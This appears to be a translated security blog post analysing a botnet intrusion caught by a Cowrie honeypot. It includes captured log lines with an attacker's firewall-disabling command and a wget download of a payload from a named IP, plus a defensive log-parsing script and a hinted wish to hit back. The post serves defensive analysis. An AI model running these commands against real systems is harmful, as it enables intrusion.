I got attacked | Honeypot capture
Honeypot captures a botnet program: let the "hacker" get a taste of what a botnet feels like
w3bsafe35 2020-01-14 13:46:54 784 views

Background: the honeypot captured a botnet program. The log is as follows:

{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.529345Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.client.size","width":80,"height":24,"message":"Terminal Size: 80 24","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.760927Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.923410Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.input","input":"/etc/init.d/iptables stop","message":"CMD: /etc/init.d/iptables stop","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.979618Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.failed","input":"/etc/init.d/iptables stop","message":"Command not found: /etc/init.d/iptables stop","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.980430Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.input","input":"wget http://123.56.244.178:8080/LinuxTF","message":"CMD: wget http://123.56.244.178:8080/LinuxTF","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:41.968671Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","size":3557,"shasum":"5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","duplicate":true,"duration":42.07410550117493,"message":"Closing TTY Log: var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105 after 42 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.967740Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.session.closed","duration":57.2117645740509,"message":"Connection lost after 57 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.969413Z","src_ip":"112.30.132.7","session":"3ee826127229"}


Loading the sample into IDA reveals the domain name of the botnet's host


songjing.123net.com, IP 123.56.244.178, Alibaba Cloud


Port 8080 is the server the botnet downloads its payload from: an HFS (HTTP File Server) instance, the standard setup of DDoS kiddies

Now let's look at the log again

{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","size":3557,"shasum":"5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","duplicate":true,"duration":42.07410550117493,"message":"Closing TTY Log: var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105 after 42 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.967740Z","src_ip":"112.30.132.7","session":"3ee826127229"}

112.30.132.7 is the host the botnet uses for scanning, brute-forcing, uploading the payload and recruiting bots
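The two log passages above are read by hand; as an added example (not part of the original post), here is a small Python parser that groups Cowrie JSON events by session and pulls out the fields a responder needs: attacker IP, credentials that succeeded, commands run, failed commands, and any payload URLs, then flattens them into indicators for a blocklist or threat-intel lookup. The sample events are copied from the log quoted in the post; the function and indicator names are my own.

```python
import json
import re
from collections import defaultdict

# Sample Cowrie JSON events, copied from the log quoted in the post above.
SAMPLE_LOG = r'''
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.529345Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.input","input":"/etc/init.d/iptables stop","message":"CMD: /etc/init.d/iptables stop","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.979618Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.failed","input":"/etc/init.d/iptables stop","message":"Command not found: /etc/init.d/iptables stop","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.980430Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.input","input":"wget http://123.56.244.178:8080/LinuxTF","message":"CMD: wget http://123.56.244.178:8080/LinuxTF","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:41.968671Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.session.closed","duration":57.2117645740509,"message":"Connection lost after 57 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.969413Z","src_ip":"112.30.132.7","session":"3ee826127229"}
'''

# Matches http(s) URLs inside a shell command line, stopping at shell metacharacters.
URL_RE = re.compile(r'https?://[^\s"\'<>|;&]+')


def summarize_sessions(log_text):
    """Group Cowrie events by session id and collect the responder-relevant fields."""
    sessions = defaultdict(lambda: {"src_ip": None, "credentials": [], "commands": [],
                                    "failed": [], "urls": set(), "duration": None})
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip a truncated or corrupt line rather than abort the whole file
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev.get("eventid")
        if eid == "cowrie.login.success":
            s["credentials"].append((ev["username"], ev["password"]))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev["input"])
            s["urls"].update(URL_RE.findall(ev["input"]))  # payload download stages
        elif eid == "cowrie.command.failed":
            s["failed"].append(ev["input"])
        elif eid == "cowrie.session.closed":
            s["duration"] = ev.get("duration")
    return dict(sessions)


def indicators(sessions):
    """Flatten sessions into a deduplicated set of (kind, value) indicators."""
    out = set()
    for s in sessions.values():
        if s["src_ip"]:
            out.add(("attacker_ip", s["src_ip"]))
        for u in s["urls"]:
            out.add(("payload_url", u))
            out.add(("payload_host", u.split("//", 1)[1].split("/", 1)[0]))
    return out


if __name__ == "__main__":
    for kind, value in sorted(indicators(summarize_sessions(SAMPLE_LOG))):
        print(f"{kind:13} {value}")
```

Run over a real `cowrie.json`, the attacker IP comes out as the brute-force source and the payload host as the distribution server, which is exactly the split the post draws between the two addresses.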

Fight fire with fire, to keep other machines on the public internet from being victimized


[ThreatBook lookup screenshot: IP addresses (2), with columns for threat intel count, open ports, associated domain, related samples and ThreatBook tags; domain (1), with columns for threat intel count, subdomains, historical IP resolutions, related samples and ThreatBook tags]
Anonymous user 2020-01-17 20:34:56 Reply
Nice, nice
Anonymous user 2020-01-15 10:36:05 Reply
Tianfa (天罚) DoS, used a lot by small-time domestic hackers
1行 2020-01-14 15:49:54 Reply
Looks like a domestic C2, a Tianfa one
Anonymous user 2020-01-14 14:29:41 Reply
123nat.com, haha, 123net got caught in the crossfire for no reason
w3bsafe35 2020-01-14 15:21:16 Reply
A slip of the pen, not a mistake. If I had got it wrong it would be more than just embarrassing
Anonymous user 2020-01-14 14:23:25 Reply
That domain name is written wrong
w3bsafe35 2020-01-14 15:20:21 Reply
Embarrassing